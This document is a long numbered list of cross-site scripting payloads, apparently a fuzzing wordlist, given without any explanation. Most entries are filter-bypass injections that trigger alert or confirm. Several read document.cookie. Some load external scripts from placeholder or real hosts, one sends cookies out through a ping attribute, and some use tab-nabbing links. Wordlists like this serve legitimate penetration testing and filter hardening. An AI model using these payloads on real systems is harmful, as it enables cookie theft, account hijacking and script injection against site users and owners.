  661. <a href=”\xE2\x80\x82javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  662. <a href=”\xE2\x80\x83javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  663. <a href=”\xE2\x80\x84javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  664. <a href=”\xE2\x80\x85javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  665. <a href=”\xE2\x80\x86javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  666. <a href=”\xE2\x80\x87javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  667. <a href=”\xE2\x80\x88javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  668. <a href=”\xE2\x80\x89javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  669. <a href=”\xE2\x80\x8Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  670. <a href=”\xE2\x80\xA8javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  671. <a href=”\xE2\x80\xA9javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  672. <a href=”\xE2\x80\xAFjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  673. <a href=”\xE2\x81\x9Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  674. <a href=”\xE3\x80\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  675. <a href=``xss.cx``>
  676. <a href=”xss.php?a=<sc%0aript>alert(/1/)</script>”>
  677. <a href=?xss=<script>>link</a>
  678. <a href=��?xss=<script>��>link</a>
  679. <a href=”xxx# onclick=alert(1)//[255]”></a>
  680. <a href=”xxx# onclick=alert(1)//[64kb]”></a>
  681. ><a id=ahref=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id=xss-test>Click me</a>#a <
  682. ��><a id=��a��href=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id=��xss-test��>Click me</a>#a <
  683. ><a id=ahref=javascript&colon;a\u006cer\u0074&lpar;/xss-by-shawar/&rpar; id=xss-test>Click me</a>#a <
  684. <a����id=a href=��onclick=alert(9)>foo</a>
  685. a id=CLOSURE_BASE_PATHhref=http://attacker/xss /a
  686. <a id=�� href=����>��href=javascript:alert(9)>foo</a>
  687. <a id=��href=http://web.site/��onclick=alert(9)>foo</a>
  688. <a id=��http://web.site/��onclick=alert(9)<!�Vhref=a>foo</a>�V>
  689. <a id=”x” href=’http://adspecs.yahoo.com/adspecs.php' target=”close(/*grabcookie(1)*/)”>CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>
  690. <a id=”x”><rect fill=”white” width=”1000" height=”1000"/></a>
  691. <a id=XSS href=”about:<script>alert(‘XSS’);</script>”>
  692. a(){};if(true){/*/alert();a=`,x={//
  693. a(){};if(true){/*/alert();a=`,x={//”’<>\r\n\ being escaped
  694. aim: &c:\windows\system32\calc.exe” ini=”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat”
  695. “/></a></><img src=1.gif onerror=alert(1)>
  696. <A “””><IMG SRC=”javascript:confirm(1)”>
  697. a?><img src= onerror=confirm(1)>
  698. .ajax
  699. a.jsp/<script>alert(‘Vulnerable’)</script>
  700. <a language=vbs onclick=’addUser(\”11\\\”&alert(1)\\\”\”)’>add</a>
  701. [_`${_=`ale`}`]
  702. ‘ale’%2B’rt’%2Blocation.hash.substr(1)>#(1)
  703. ale%2Brt%2Blocation.hash.substr(1)>#(1)
  704. alert``
  705. A+L+E+R+T;
  706. +alert(0)+
  707. ‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(4)</SCRIPT>=&{}”);}alert(6);function xss(){//
  708. ‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}”);}
  709. alert(+’???0O2471???’)
  710. ‘;alert(0x000123)’
  711. ‘+alert(0x000123)+’
  712. \”; alert(0x000123)
  713. `${alert(1)/*}`*/}`
  714. `$alert(1)}`
  715. */alert(1)/*
  716. ; alert(1);
  717. ?alert(1)”,
  718. ‘|alert(1)|’
  719. ‘-alert(1)-’
  720. ‘-alert(1)//
  721. ‘}};alert(1);{{‘
  722. ‘}alert(1);{‘
  723. “-alert(1)-”
  724. “‘-alert(1)-’”
  725. “}]}’;alert(1);{{‘
  726. ({‘ \’(){alert(1)}})[` \`]()
  727. (alert)(1)
  728. )alert(1);//
  729. […`${alert(1)}`]
  730. ${alert`1`}`
  731. */alert(1)/*
  732. \;alert(1)//
  733. \’-alert(1)//
  734. \’-alert(1)};{//
  735. \’}alert(1);{//
  736. \”;alert(1);//
  737. \\;alert(1)//
  738. \\��;alert(1)//
  739. \��;alert(1)//
  740. #*/alert(1)
  741. alert`1`
  742. alert(1,)//
  743. alert(1){}{}{}{}
  744. alert(1){}
  745. alert(1)
  746. ‘}alert(1)%0A{‘
  747. ;alert(123);
  748. ‘;alert(123);t=’
  749. “;alert(123);t=”
  750. ‘>alert(154)</script><script/154=’
  751. */alert(155)</script><script>/*
  752. */alert(156)”>’onload=”/*<svg/156=’
  753. `-alert(158)”>’onload=”`<svg/158=’
  754. <alert(192)<! — onmouseover=location=innerHTML+outerHTML>javascript:192/*00000*/
  755. “”});});});alert(1);$(‘a’).each(function(i){$(this).click(function(event){x({y
  756. <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf)
  757. alert(1) /alert`2`/i
  758. “])},alert(1));(function xss() {//
  759. alert(1)>//INJECTX
  760. “alert(1)” instanceof [];
  761. -alert(1)<javascript: onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
  762. “-alert(1)<javascript:” onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
  763. -alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:click me!
  764. “-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:”click me!
  765. alert(1)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’).x.y.LOL()
  766. <alert(1)<! — onclick=location=innerHTML+outerHTML>javascript:1/*click me!*/</alert(1)<! — →
  767. `-alert(1)”>’onload=”`<svg/1=’
  768. */alert(1)”>’onload=”/*<svg/1=’
  769. ‘alert(1)’.replace(/.+/,eval)
  770. “alert(1)”.replace(/./g,function(c){return String.fromCharCode(parseInt(‘26’+c.charCodeAt(0).toString(16),16))})
  771. */alert(1)</script><script>/*
  772. ‘>alert(1)</script><script/1=’
  773. ‘>alert(1)</script><script/1=’
  774. alert(1)-/><script>///</textarea>
  775. alert(1)// →</svg><script>0</script>
  776. -alert(1)-<svg><!V
  777. ‘-alert(1)-’<svg><!V
  778. <alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!V>
  779. “};alert(23);a={“a”:
  780. /alert`2`/i
  781. “>*/alert(35)</script><script>/*<kukux//
  782. alert&#40;1&#41
  783. <alert(40)<! — onmouseover=location=innerHTML%2bouterHTML>javascript:1/*00000*/
  784. `-alert(5)</script><script>`
  785. “`-alert(67)</script><script>`
  786. ‘-alert(79)-’
  787. ‘-alert(80)//
  788. \’-alert(81)//
  789. (alert)(82)
  790. alert(9)��>foo</a>
  791. -alert(9)<javascript:” onclick=location=tagName+previousSibling.nodeValue>click me!
  792. ‘-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling.nodeValue>cript:’click me!
  793. alert(a.source)</SCRIPT>
  794. alert = a\u006cer\u0074
  795. Alert = a\u006cer\u0074
  796. alert.call(this, document.cookie)
  797. alert(doc.domain); // The same domain as the top page
  798. alert(document[“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
  799. alert(document.cookie)
  800. alert(document[‘cookie’])
  801. ; alert(document.cookie); var foo=
  802. ��; alert(document.cookie); var foo=��
  803. ‘);alert(‘done’);var b=(‘
  804. alert(/foo bar/.source)
  805. “;alert(“I am coming again~”);”
  806. }alert(/INJECTX/);{//
  807. alert(‘Latitude:’+p.coords.latitude+’,Longitude:’+
  808. alert&lpar;1&rpar;
  809. alert;pg(“XSS”)
  810. ‘;alert(String&#46;fromCharCode(88,83,83))//\’;alert(String&#46;fromCharCode(88,83,83))//\”;alert(String&#46;fromCharCode(88,83,83))//\\”;alert(String&#46;fromCharCode(88,83,83))// — &gt;&lt;/SCRIPT&gt;\”&gt;’&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  811. //”;alert(String.fromCharCode(88,83,83))
  812. ‘;alert(String.fromCharCode(88,83,83))//
  813. alert(String.fromCharCode(88,83,83));’))”>
  814. alert(String.fromCharCode(88,83,83));’))”>
  815. ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
  816. alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// — 
  817. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//&#45;&#45;></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  818. <”’;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  819. ‘;;alert(String.fromCharCode(88,83,83))//\’;;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))// →;<;/SCRIPT>;”;>;’;>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  820. ‘;alert(String.fromCharCode(88,83,83))//’;alert(String. fromCharCode(88,83,83))//”;alert(String.fromCharCode (88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
  821. ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// — /SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  822. ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  823. ‘;alert(String.fromCharCode(88,83,83))//\’; alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//\”; alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>
  824. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT> — !><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  825. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  826. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  827. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  828. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  829. ;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//V></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  830. alert(String.fromCodePoint(88,83,83))
  831. alert(String(/xss/).substr(1,3))
  832. alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74” ][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
  833. alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
  834. alert(unescape(escape(/????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????/).replace(/u.{8}/g,[])))
  835. alert(unescape(escape(/??/).replace(/u.{8}/g,[])))
  836. alert(win == window); // false
  837. alert&#x28;1&#x29
  838. ‘;alert(/xss/)///
  839. );alert(Xss);//
  840. ��);alert(��Xss��);//
  841. ‘|alert(‘XSS’)|’
  842. ‘); alert(‘XSS
  843. “;alert(‘XSS’);//
  844. \”;;alert(‘;XSS’;);//
  845. \”;alert(‘XSS’);//
  846. \\”;alert(‘XSS’);//
  847. : ({[alert`xss`]:1})
  848. ({[alert`xss`]:1})
  849. ‘;alert(/xss/)///’;alert(1)//”;alert(2)///”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(/xss/)</SCRIPT>=&{}”);}alert(6);functions+xss(){//
  850. );alert(xss-by-shawar);//
  851. alert(/xss/.source)
  852. ‘); alert(‘xss’); var x=’
  853. \\’); alert(\’xss\’);var x=\’
  854. ��); alert(��XSS Vulnerability��); void(��0 ‘ “/>”><img src=x onerror=prompt(/XSS/)>
  855. /ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
  856. /ale/.source + /rt/.source
  857. alt=’”name=’onerror=alert()//’
  858. alt= onclick=alert(1)
  859. alt=””onclick=”alert(1)”
  860. alt=``onload=alert(1)
  861. al\u0065rt(1)
  862. al\u0065rt(87)
  863. always>%20<param%20name=url%20value=https://l0.cm/xss.swf>
  864. always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
  865. <a name=javascript:alert(1) href=//target.com/?xss=<svg/onload=location=name//>CLICK</a>
  866. angular.bind(self, alert, 9)()
  867. angular.element.apply(alert(9))
  868. <animate attributeName=”onunload” to=”alert(1)”/>
  869. <animate attributeName=”xlink:href” begin=”0" from=”javascript:alert(1)” to=”&” />
  870. /><animate attributeName=”xlink:href” values=”;javascript:alert(1)”
  871. <animation xlink:href=”data:text/xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
  872. <animation xlink:href=”javascript:alert(1)”/>
  873. <anytag onclick=alert(16)>M
  874. <anytag onmouseover=alert(15)>M
  875. anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
  876. anythinglr00</script><script>alert(document.domain)</script>uxldz
  877. <anything onbeforescriptexecute=confirm(1)>
  878. <anything onmouseover=javascript:confirm(1)>
  879. <a onclick=alert(18)>M
  880. <a=” onclick=”alert(1)//”>clickme</a>
  881. <a onclick=”i=createElement(‘iframe’);i.src=’javascript:alert(/xss/)’;x=parentNode;x.appendChild(i);” href=”#”>Test</a>
  882. <a oncut=alert(1)>
  883. <a/oncut=alert(1)>
  884. <a onhelp=’eval(href+”confirm(1)”)’contenteditable=’true’href=’&#32;javascript:’>click</a>
  885. <a onkeydown=alert(document.cookie)>xxs link</a>
  886. <a onkeypress=”alert(document.cookie)”>xxs link</a>
  887. <a onkeypress=alert(document.cookie)>xxs link</a>
  888. <a onkeyup=”alert(document.cookie)”>xxs link</a>
  889. [[a|onload=alert(1)]]
  890. <a onload=”alert(document.cookie)”>xxs link</a>
  891. <a onload=alert(document.cookie)>xxs link</a>
  892. </a onmousemove=”alert(1)”>
  893. <a/onmousemove=alert(1)//>renwax23
  894. <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3 B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x 6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
  895. <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
  896. <a onmouseover%3D”alert(1)”>renwax23
  897. <a onmouseover=alert(17)>M
  898. <a onmouseover=”alert(document.cookie)”>xxs link</a>
  899. <a onmouseover=alert(document.cookie)>xxs link</a>
  900. <a onmouseover=”javascript:window.onerror=alert;throw 1>
  901. <a onmouseover=location=’&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#10 1&#114&#116&#40&#49&#41'>a<a>
  902. <a onmouseover=location=’&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'>a<a>
  903. <a onmouseover=location=��javascript:alert(1)>click
  904. <a onmouseover=location=javascript:alert(1)>click
  905. <a onmouseover=location=zjavascript:alert(1)>click
  906. <a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec
  907. <a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B’>
  908. <a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B’>xss
  909. a. ping=`//pkav/?${escape(document.cookie)}`
  910. &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))// — &gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  911. &apos;&apos;;! — &quot;&lt;XSS&gt;=&amp;{()}
  912. appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
  913. appendChild(createElement(“script”)).src=”//HOST:PORT”},0)>
  914. <APPLET+CODE=””+CODEBASE="http://url/xss">
  915. <applet code=javascript:alert(‘sgl’)>
  916. <applet code=”javascript:confirm(document.cookie);”>
  917. <Applet code = “javascript: confirm (document.cookie);”>
  918. <applet code=”javascript:confirm(document.cookie);”> // Firefox Only
  919. <applet/object onerror=alert(‘XSS’)>
  920. <applet onerror=”alert(1)”></applet>
  921. <applet onerror applet onerror=”javascript:javascript:alert(1)”></applet onerror>
  922. <applet onError applet onError=”javascript:javascript:alert(1)”></applet onError>
  923. <applet onreadystatechange applet onreadystatechange=”javascript:javascript:alert(1)”></applet onreadystatechange>
  924. <applet onReadyStateChange applet onReadyStateChange=”javascript:javascript:alert(1)”></applet onReadyStateChange>
  925. &a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
  926. a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
  927. <a rel=”noreferrer” href=”//google.com”>click</a>
  928. <a rel=”noreferrer” href=”//xss.cx”>click</a>
  929. arg 1�Galert(1)
  930. Array.from([1],alert)
  931. Array.map([1],alert)
  932. Array.prototype[Symbol.hasInstance]=eval;”alert(1)” instanceof [];
  933. Array[Symbol.species].constructor(‘alert(1)’)();
  934. <article xmlns =”urn:img src=x onerror=xss()//” >renwax23
  935. a?<script>alert(‘Vulnerable’)</script>
  936. ascript:alert(‘XSS’);”>
  937. ?asfunction:getURL,javascript:alert(1)//”,
  938. ASP a = val1,val2
  939. ASP.NET a = val1,val2
  940. <a style=”behavior:url(#default#AnchorClick);” folder=”javascript:alert(1)”>click</a>
  941. <a style=”behavior:url(#default#AnchorClick);” folder=”javascript:javascript:alert(1)”>XXX</a>
  942. <a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a>
  943. <a style=”-o-link:’javascript:javascript:alert(1)’;-o-link-source:current”>X
  944. <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”alert(1);”>XXX</a></a><a href=”javascript:alert(2)”>XXX</a>
  945. <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”javascript:alert(1);”>XXX</a></a><a href=”javascript:javascript:alert(1)”>XXX</a>
  946. </a style=””xx:expr/**/ession(document.appendChild(document.createElement(‘script’)).src=’http://h4k.in/i.js')">
  947. <a target=_blank href=”data:text/html,<script>confirm(opener.document.body.innerHTML)</script>”>clickme in Opera/FF</a>
  948. “‘> →<a/target=_blank href=//go.bmoine.fr/tab-nabbing>Polyglot XSS</a>
  949. <a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
  950. <a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
  951. <a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
  952. <a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
  953. <a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  954. <a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  955. <a target=”x” href=”xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
  956. atob.constructor(atob`YWxlcnQoMSk`)``
  957. atob.constructor(atob(/YWxlcnQoMSk/.source))()
  958. atob.constructor(unescape([…escape((??????????????????????????????????????????????????=?=>?).name)].filter((?,?)=>?%12<1|?%12>9).join([])))()
  959. atob(“YWxlcnQoMSk=”)
  960. atob`YWxlcnQoMSk` instanceof window
  961. [atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
  962. {{a=toString().constructor.prototype;a.charAt=a.trim;$eval(‘a,alert(1),a’)}}
  963. {{ ‘a’[{toString:false,valueOf:[].join,length:1,0:’__proto__’}].charAt=[].join; $eval(‘x=alert(1)//’); }}
  964. {{‘a’[{toString:[].join,length:1,0:’__proto__’}].charAt=’’.valueOf;$eval(“x=’”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+”’”);}}
  965. .attr
  966. attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
  967. \’-a\u{6c}e\u{72}t(1))%0a →
  968. <audio onerror=”javascript:alert(1)”><source>//INJECTX
  969. <AuDiO/**/oNLoaDStaRt=’(_=/**/confirm/**/(1))’/src><! — renwax23
  970. <audio src=1 href=1 onerror=”javascript:alert(1)”></audio>
  971. <audio src=1 onerror=alert(1)>
  972. <audio src=”data:audio/mp3,%FF%F3%84%C4%FF%F3%14% C4" oncanplay=”alert(1)”>
  973. <audio src onloadstart=alert(1)>
  974. <audio src onloadstart=alert(101)>
  975. <audio src=x onerror=confirm(“1”)>
  976. <audio src=x onerror=prompt(1);>
  977. <audio src=x onerror=prompt(1);>
  978. “ autofocus onfocus=alert(1) “
  979. “autofocus/onfocus=alert(1)//
  980. “autofocus/onfocus=alert(1)
  981. autofocusonfocus=alert(1)//
  982. ‘“/autofocus/onfocus=’alert(1)’x=
  983. “autofocus/onfocus=alert(78)//
  984. ‘ autofocus onkeyup=’javascript:alert(123)
  985. “ autofocus onkeyup=”javascript:alert(123)
  986. “autof<x>ocus o<x>nfocus=alert<x>(1)//
  987. <AutoStart>1</AutoStart>
  988. avascript&#x3A;alert&lpar;document&period;cookie&rpar;
  989. <A?vg><A?cript/href=//aEa?L>
  990. <a[\x0B]
  991. <a xlink:href=”http://google.com">
  992. <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/></a>
  993. <a xmlns:xlink=��http://www.w3.org/1999/xlink�� xlink:href=��javascript:alert(9)��>
  994. ><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe
  995. ��><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe
  996. ><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/XSS-by-Shawar/&rpar;>ClickMe
  997. a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29}
  998. a{xxx:expression(if(!window.x){alert(‘xss’);window.x=1;})}
  999. <a z=&x=& onmousemove=t=Object(window.name);
  1000. <a z=&x=& onmousemove=t=Object(window.name);({$:#0=t,z:eval(String(#0#).replace(/@/g,))}).z//>
  1001. b=`*/(1)}`;
  1002.  
  1003. <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
  1004. <BackgroundColor>FFFFFF</BackgroundColor>
  1005. background-repeat:no-repeat V><math><!V
  1006. background:url(‘//brutelogic.com.br/webgun/img/youtube1.jpg’);
  1007. background:url(//brutelogic.com.br/webgun/img/youtube1.jpg);background-repeat:no-repeat V><math><!V
  1008. <b/alt=”1"onmouseover=InputBox+1
  1009. <b/alt=”1"onmouseover=InputBox+1 language=vbs>test</b>
  1010. <b/alt=”1"onmouseover=InputBox+1language=vbs>test</b>
  1011. banner.swf?clickTAG=javascript:alert(1);//
